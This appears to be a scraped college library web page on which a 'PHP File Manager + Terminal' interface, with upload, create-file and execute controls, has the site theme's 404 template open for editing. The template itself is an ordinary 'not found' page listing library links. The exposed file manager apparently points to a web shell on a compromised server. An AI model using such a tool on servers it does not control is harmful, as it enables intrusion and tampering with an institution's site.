Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //var/www/html/library/wp-content/themes/mobius Upload Create File Create Folder Execute Editing: /var/www/html/library/wp-content/themes/mobius/404.php<?php /** * The template for displaying 404 pages (Not Found). * * @package WordPress * @subpackage smpl * @since smpl 0.1 */ get_header(); do_action('st_content_wrap'); ?> <h1><?php _e( 'Resource Not Found', 'smpl' ); ?></h1> <p><?php _e( 'We\'re sorry, but the page you\'re trying to get to may have moved.', 'smpl' ); ?></p> <h3><?php _e('Maybe try?', 'smpl' ); ?></h3> <p><?php _e( 'These are the most popular links, maybe one of these is what you were looking for?', 'smpl' ); ?></p> <ul> <li><a href="http://onesearch.cuny.edu/primo-explore/search?vid=bm&lang=en_US&sortby=rank">Library Catalog</a></li> <li><a href="https://bmcc.libguides.com/az.php">Databases A-Z</a></li> <li><a href="http://lib1.bmcc.cuny.edu/hours">Library Hours</a></li> <li><a href="https://bmcc.libguides.com/cite">Citation Guide</a></li> <li><a href="https://bmcc.libguides.com/">All Library Guides</a></li> <li><a href="http://lib1.bmcc.cuny.edu/help/ask-us">Ask a Librarian</a></li> <li><a href="http://lib1.bmcc.cuny.edu">Return to the Library Homepage</a></li> </ul> <!--<?php get_search_form(); ?> --> <script type="text/javascript"> // focus on search field after it has loaded document.getElementById('s') && document.getElementById('s').focus(); </script> <?php do_action('st_content_wrap_close'); get_sidebar('page'); get_footer(); ?>Save